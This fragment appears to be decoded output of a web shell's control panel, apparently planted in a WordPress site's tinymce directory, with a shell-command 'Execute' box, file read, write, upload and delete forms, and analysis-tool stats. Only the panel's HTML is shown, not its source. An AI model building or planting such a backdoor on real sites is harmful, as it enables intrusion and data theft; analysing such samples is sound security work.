onclick="g('FilesTools',null,'validate.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'validate.js', 'download')">D</a></td></tr><tr><td colspan=7>
<input type=hidden name=ne value=''>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='/home/nathanlatx/www/wp-includes/js/tinymce/utils/'>
<input type=hidden name=charset value='Windows-1251'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option><option value='tar'>Compress (tar.gz)</option></select> <input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit="g(null,this.c.value,'');return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/home/nathanlatx/www/wp-includes/js/tinymce/utils/'><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='/home/nathanlatx/www/wp-includes/js/tinymce/utils/'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=ne value=''>
<input type=hidden name=charset value='Windows-1251'>
<span>Upload file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>Function Calls
| None |
Stats
| MD5 | f077f192ded7d703b2f6cb2f93e66956 |
| Eval Count | 0 |
| Decode Time | 99 ms |